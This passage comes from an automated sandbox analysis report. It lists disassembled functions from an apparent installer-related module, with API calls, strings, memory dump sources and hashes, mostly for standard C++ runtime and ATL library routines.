                                                                        • Part of subcall function 00D8780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00D8788C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~__swprintf
                                                                      • String ID: %.0Lf
                                                                      • API String ID: 2348759532-1402515088
                                                                      • Opcode ID: 6ade29e9279643c5679760c09b4c177836d2803ef789d730ffcd0eb294d86bef
                                                                      • Instruction ID: f6e533b58d15ec611b8f8d4b93d5b4ae21efb1be3bdd1bb407a1bc119ae9fdac
                                                                      • Opcode Fuzzy Hash: 6ade29e9279643c5679760c09b4c177836d2803ef789d730ffcd0eb294d86bef
                                                                      • Instruction Fuzzy Hash: 0B514A71D00249EBCF05EFE4D885AEDBBB9FF08300F208559E546AB295EB349905CFA4
                                                                      Function 00D9258E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D92595
                                                                      • _swprintf.LIBCMT ref: 00D9260D
                                                                        • Part of subcall function 00D7B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D7B52D
                                                                        • Part of subcall function 00D7B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D7B550
                                                                        • Part of subcall function 00D7B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B578
                                                                        • Part of subcall function 00D7B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                      • String ID: %.0Lf
                                                                      • API String ID: 1487807907-1402515088
                                                                      • Opcode ID: 5499c76c979ff51820909e1c100b97374e23c7b23e3c879b483747f3ffbf6b67
                                                                      • Instruction ID: 1b33cedc087aaf26a0ee831b70320a57dd5b441b8da11e614d1eabc616e9a750
                                                                      • Opcode Fuzzy Hash: 5499c76c979ff51820909e1c100b97374e23c7b23e3c879b483747f3ffbf6b67
                                                                      • Instruction Fuzzy Hash: 9B515C71D00249EBCF05DFE4D895AEDBBB9FF08300F208519E546AB295EB359905CF60
                                                                      Function 00D96607 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D9660E
                                                                      • _swprintf.LIBCMT ref: 00D96686
                                                                        • Part of subcall function 00D7C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5BD
                                                                        • Part of subcall function 00D7C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5E0
                                                                        • Part of subcall function 00D7C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C608
                                                                        • Part of subcall function 00D7C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C6A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                      • String ID: %.0Lf
                                                                      • API String ID: 1487807907-1402515088
                                                                      • Opcode ID: d8f9a94c7cc552bdec562eedd53f230e0ec87bdff3a7742ac915cf8cfc882ad0
                                                                      • Instruction ID: 41cc729d00c0da7a0a1d2cbfa3ce7ee540a58f8f22b912783ed87040c651ac76
                                                                      • Opcode Fuzzy Hash: d8f9a94c7cc552bdec562eedd53f230e0ec87bdff3a7742ac915cf8cfc882ad0
                                                                      • Instruction Fuzzy Hash: 8D514771D00209EBDF09DFE4D885ADDBBB9FB08700F20855AE506AB2A5EB359915CF60
                                                                      Function 00D79620 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \\?\$\\?\UNC\
                                                                      • API String ID: 0-3019864461
                                                                      • Opcode ID: f6510211b239f031668979890ec5a6071ca427a704b347485b63abbab83980b8
                                                                      • Instruction ID: de4f198d5bd13d51906beb583bb68440ff2b90c5bb385ae24a26aee5a64e91c4
                                                                      • Opcode Fuzzy Hash: f6510211b239f031668979890ec5a6071ca427a704b347485b63abbab83980b8
                                                                      • Instruction Fuzzy Hash: 8651D2719102049BDB14CF68C895BAEF7F5FF95314F10861EE406B7280EB75A988CBB0
                                                                      Function 00D9B5D1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EncodePointer.KERNEL32(00000000,?), ref: 00D9B5F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 2118026453-2084237596
                                                                      • Opcode ID: 1363626e6215c34a6f4c0d5cee6e341c45ba9fd96268371236a1f3e678ae8819
                                                                      • Instruction ID: 0bef67379d42acd3b7f4ffa3281614b8a7803a846d178c7e8521e3eae3d4eb1b
                                                                      • Opcode Fuzzy Hash: 1363626e6215c34a6f4c0d5cee6e341c45ba9fd96268371236a1f3e678ae8819
                                                                      • Instruction Fuzzy Hash: 13417B71900209AFCF15CF98DE85AEEBBB5FF48314F19815AF9046B211D735A950DB60
                                                                      Function 00D9217C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D92183
                                                                        • Part of subcall function 00D8780A: __EH_prolog3.LIBCMT ref: 00D87811
                                                                        • Part of subcall function 00D8780A: std::_Lockit::_Lockit.LIBCPMT ref: 00D8781B
                                                                        • Part of subcall function 00D8780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00D8788C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                      • String ID: %.0Lf$0123456789-
                                                                      • API String ID: 2728201062-3094241602
                                                                      • Opcode ID: c4748352d71c4761728da1cfdf05a0e48af058f07f3811d7390c2447f50dd57c
                                                                      • Instruction ID: ac04f216037d5db377370032f2f9a813757918366d9e86b1cc94c4bd196bfd05
                                                                      • Opcode Fuzzy Hash: c4748352d71c4761728da1cfdf05a0e48af058f07f3811d7390c2447f50dd57c
                                                                      • Instruction Fuzzy Hash: 6D414B31900219EFCF15EFA8C8819EDBBB5FF09310F144159E811AB251DB309956CB79
                                                                      Function 00D964DB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D964E2
                                                                        • Part of subcall function 00D7C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5BD
                                                                        • Part of subcall function 00D7C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5E0
                                                                        • Part of subcall function 00D7C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C608
                                                                        • Part of subcall function 00D7C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C6A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                      • String ID: 0123456789-$0123456789-
                                                                      • API String ID: 2088892359-2494171821
                                                                      • Opcode ID: 14418e82ab6c730d28617a45dfe1a57f91209dac65b7e61159a70ce85c91623c
                                                                      • Instruction ID: 2bf835fef67d607dfd47e2d20bbd1e2cc291949f8b7a787f67da2778e75c1e40
                                                                      • Opcode Fuzzy Hash: 14418e82ab6c730d28617a45dfe1a57f91209dac65b7e61159a70ce85c91623c
                                                                      • Instruction Fuzzy Hash: C8415B31900209EFCF09EFA8D8919EE7BB5EF09310F11405AF415A7255EB35DA15CB65
                                                                      Function 00D92460 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D92467
                                                                        • Part of subcall function 00D7B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D7B52D
                                                                        • Part of subcall function 00D7B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D7B550
                                                                        • Part of subcall function 00D7B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B578
                                                                        • Part of subcall function 00D7B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                      • String ID: 0123456789-$0123456789-
                                                                      • API String ID: 2088892359-2494171821
                                                                      • Opcode ID: dfb41d71123c264cd424bfb6bccbdaad971ab29496499a01630aa267204f73bb
                                                                      • Instruction ID: 251a850bcbbd870654717da9ddd6bca46a760b3bb117de3719e1d60484b5e3c4
                                                                      • Opcode Fuzzy Hash: dfb41d71123c264cd424bfb6bccbdaad971ab29496499a01630aa267204f73bb
                                                                      • Instruction Fuzzy Hash: 5E415931900218EFCF15EFA8D8919EDBBB5FF08310F15416AF805AB251EB309A56DB75
                                                                      Function 00D967B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3___cftoe
                                                                      • String ID: !%x
                                                                      • API String ID: 855520168-1893981228
                                                                      • Opcode ID: c64d24dc69608c15fe4346438c2c095d12c9a6fe4cc919b18903808fa595ceb3
                                                                      • Instruction ID: 05c4f612d327da18af564960eaa11770e0a5b54615e25861e44304b6aa1138c3
                                                                      • Opcode Fuzzy Hash: c64d24dc69608c15fe4346438c2c095d12c9a6fe4cc919b18903808fa595ceb3
                                                                      • Instruction Fuzzy Hash: 3C41F474A11249EFDF05DFA8D881AEEBBB1BF08304F144429F955A7352E7349A05CBB1
                                                                      Function 00D92DB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3___cftoe
                                                                      • String ID: !%x
                                                                      • API String ID: 855520168-1893981228
                                                                      • Opcode ID: e9a382dd7779d786bb3d04e71e42cfd3bda5270db095c58d62d24b7a9f260960
                                                                      • Instruction ID: 7267091d5f0582d66ea1549467fea138074b19a027690cd253194e33f2c3a81a
                                                                      • Opcode Fuzzy Hash: e9a382dd7779d786bb3d04e71e42cfd3bda5270db095c58d62d24b7a9f260960
                                                                      • Instruction Fuzzy Hash: 19313A75A10209EBDF04DFA8D981AEEB7B2FF48304F208429F945AB251E7349E05CB74
                                                                      Function 00D7D5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %$+
                                                                      • API String ID: 589789837-2626897407
                                                                      • Opcode ID: 2a20b40053c91f0dc845d2ec18491119570b181c5838c32b273ac96a6192c311
                                                                      • Instruction ID: 2e9ede4588ad06aa48c396c85ebb67de9baa6c9543b6b0cec40505eb81e39c36
                                                                      • Opcode Fuzzy Hash: 2a20b40053c91f0dc845d2ec18491119570b181c5838c32b273ac96a6192c311
                                                                      • Instruction Fuzzy Hash: 1421A0711083489FD711CF18C859B9BBBEAAF89304F04855DF99897292E634D918C7B2
                                                                      Function 00D7D6C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %$+
                                                                      • API String ID: 589789837-2626897407
                                                                      • Opcode ID: 6f88d198558d8ab4b058d3535e4e59afec3b3f4d966ee9a7abe5a0144b862a17
                                                                      • Instruction ID: ddfe9668adbe5cc82e93e5215bc0c7dffd4a8043e092d7842399d92123f33710
                                                                      • Opcode Fuzzy Hash: 6f88d198558d8ab4b058d3535e4e59afec3b3f4d966ee9a7abe5a0144b862a17
                                                                      • Instruction Fuzzy Hash: F721D1752083459FE715CF14C845B9BBBEAEF85300F048819F99587292D634D908C7B6
                                                                      Function 00D7D7B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %$+
                                                                      • API String ID: 589789837-2626897407
                                                                      • Opcode ID: 0fd706b1745311200e52e22e8fd6f30941070ea5f47bba5888b2df3f4d23b3e4
                                                                      • Instruction ID: 28cd8519e7768eec5c4154ad1c6e7b59ff26322fe5671a49f0064f604a08c431
                                                                      • Opcode Fuzzy Hash: 0fd706b1745311200e52e22e8fd6f30941070ea5f47bba5888b2df3f4d23b3e4
                                                                      • Instruction Fuzzy Hash: 9521AE712083459FE711CF18C845B9BBBEAEF89300F08881DF99897292D634D918CBB7
                                                                      Function 00D780D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00D78116
                                                                      • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,862265DA), ref: 00D78185
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ConvertFreeLocalString
                                                                      • String ID: Invalid SID
                                                                      • API String ID: 3201929900-130637731
                                                                      • Opcode ID: 3e93d963ec8f3c64722a96edd3fccb4487f97c40b1fb25e95f5bb139d18bd2db
                                                                      • Instruction ID: eca85cb0f4e3c2c42d35948e4926eba65cd500a79923058b5ee57e1ae4fc9234
                                                                      • Opcode Fuzzy Hash: 3e93d963ec8f3c64722a96edd3fccb4487f97c40b1fb25e95f5bb139d18bd2db
                                                                      • Instruction Fuzzy Hash: 3F216F74A04305DBDB14DF58C819BAFBBB9EB44B04F14865EE805A7280EBB55A458BA0
                                                                      Function 00D7C140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7C16B
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7C1CE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 3988782225-1405518554
                                                                      • Opcode ID: 8d7821ed3aa807d795fab8a8dd92d94ca8aea2894fd87819f03a84fc55d25e60
                                                                      • Instruction ID: 14228195372baf3d5527b4f96b69f70b5b9a3ec0820902949f745f8190c5bf9e
                                                                      • Opcode Fuzzy Hash: 8d7821ed3aa807d795fab8a8dd92d94ca8aea2894fd87819f03a84fc55d25e60
                                                                      • Instruction Fuzzy Hash: 5621C070805B84DED721CF68C90474BBFF4EF15714F14869EE49597781D3B5AA08CBA1
                                                                      Function 00D84077 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3_
                                                                      • String ID: false$true
                                                                      • API String ID: 2427045233-2658103896
                                                                      • Opcode ID: 1f7b0f3512805048d7daa29979c726d2ded2b1c8cd437bdfc06beb8a4479c679
                                                                      • Instruction ID: adaeefff57ac05a08f234c9785b8b988b16d5adbbdbbae10c222a5edf75d3a5a
                                                                      • Opcode Fuzzy Hash: 1f7b0f3512805048d7daa29979c726d2ded2b1c8cd437bdfc06beb8a4479c679
                                                                      • Instruction Fuzzy Hash: 6111D071900746AEC720EFB4D852B8ABBF4EF19700F04852AE0A68B281EB70E504CB70
                                                                      Function 00D81E15 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00D80B00: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,862265DA,?,00DB93B0,000000FF), ref: 00D80B27
                                                                        • Part of subcall function 00D80B00: GetLastError.KERNEL32(?,00000000,00000000,862265DA,?,00DB93B0,000000FF), ref: 00D80B31
                                                                      • IsDebuggerPresent.KERNEL32(?,?,00DCFAD8), ref: 00D81E48
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00DCFAD8), ref: 00D81E57
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D81E52
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 3511171328-631824599
                                                                      • Opcode ID: 1f27a7caf5751043fb0b86ac47cb3845d18c444dace418bfb70f9855d043ac52
                                                                      • Instruction ID: 7f3485809c6a66a9f87b9f33478e32aa1ce02c8a050d24cb9eed6cfaba64257f
